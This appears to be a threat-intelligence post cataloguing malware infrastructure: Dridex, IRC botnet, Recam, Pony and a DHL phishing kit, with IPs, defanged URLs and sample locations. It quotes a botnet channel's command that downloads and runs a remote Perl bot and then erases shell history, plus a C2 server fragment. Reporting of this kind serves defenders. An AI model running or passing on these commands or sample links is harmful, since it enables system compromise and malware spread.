62.76.191.108(Dridex Downloader Hosted In Russian Federation Saint Petersburg It House Ltd)

Url's :

hxxp://www.mraguas.com/43543r34r/843tf.exe
hxxp://clothesmaxusa.com/43543r34r/843tf.exe
hxxp://69.61.48.46/43543r34r/843tf.exe

Contact Server : 62.76.191.108:1743

Hosting Infos :
http://whois.domaintools.com/62.76.191.108

comment.dyn.mk(Linux Irc Bots Hosted In Korea, Republic Of Seoul Sk Broadband Co Ltd)

Resolved : [ comment.dyn.mk ] To [ 1.234.46.241 ] maybe hacked machine.

$server = 'comment.dyn.mk' unless $server;
my $port = '6667';

[11:00] * Now talking in #kill  (around 100 bots inside)
[11:00] * Topic is 'wget hxxp://cmt.ucoz.com/dyn.pdf;perl dyn.pdf;perl dyn.pdf;perl dyn.pdf;rm -rf dyn.pdf;history -c '
[11:00] * Set by anonplus on Thu Jan 07 17:06:34

U can get the perl bot code here if he deletes the file


Hosting Infos :
http://whois.domaintools.com/1.234.46.241

munachim.linkpc.net(Trojan-Spy.Win32.Recam.yyy Hosted In Canada Vankleek Hill Maxx Ltd.)

Resolved : [ munachim.linkpc.net ] To [ 67.215.4.74 ]

Contacted Hosts :

 hxxp://workshopnw.ddns.net
 hxxp://67.215.4.74
 hxxp://serialcheck55.serveblog.net
 hxxp://gbuzue.ddns.net:288
 hxxp://sedon1.ddns.net

Sample here : hxxp://clintonllc.com/swift.scr

Hosting Infos :
http://whois.domaintools.com/67.215.4.74

DHL Phishing Script (Hosted In United States Provo Websitewelcome.com)

Resolved : [ rentmyryde.com ] To [ 192.232.247.118 ]

Principal page : hxxp://rentmyryde.com/css/DHL/DHL/tracking.php

DHL.zip here : hxxp://rentmyryde.com/css/

Lamers behind the script : Created BY Mr-Anobs/Modified By Realone

Hosting Infos :
http://whois.domaintools.com/192.232.247.118

inmrvogurin.ru(Pony Hosted In Macao Macau Alan Hqservers Web Studio)

This guy keep changing domainnames but he uses the same shit.

Resolved : [ inmrvogurin.ru ] To [ 163.53.247.144 ]

URL'S :
hxxp://inmrvogurin.ru/SY/test/gate.php
hxxp://inmrvogurin.ru/SY/test/admin.php TF leters in red maybe a tribute to trojanforge.

Sample here : hxxp://inmrvogurin.ru/SY/test/micro.exe

Hosting Infos :
http://whois.domaintools.com/163.53.247.144